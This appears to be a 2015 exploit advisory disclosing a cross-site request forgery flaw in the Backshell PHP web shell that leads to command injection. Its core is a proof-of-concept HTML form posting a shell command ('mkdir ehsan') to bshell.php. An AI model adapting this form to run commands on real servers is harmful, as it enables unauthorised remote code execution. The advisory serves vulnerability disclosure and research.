Backshell Web Shell Cross Site Request Forgery
Posted on 27 December 2015
================================================================================ # Backshell Web Shell - CSRF Command Injection ================================================================================ # Vendor Homepage: https://github.com/neitanod/backshell # Date: 25/12/2015 # Software Link: https://github.com/neitanod/backshell/archive/master.zip # Author: Ashiyane Digital Security Team # Contact: hehsan979@gmail.com # Source: http://ehsansec.ir/advisories/bshell-csrf-rce.txt ================================================================================ # Exploit : <form action="http://localhost/a/bshell.php" method="post"> <input type="hidden" name="cmd" value="mkdir ehsan"> <input type="submit" value="submit"> </form> ================================================================================ # Discovered By : Ehsan Hosseini (EhsanSec.ir) ================================================================================
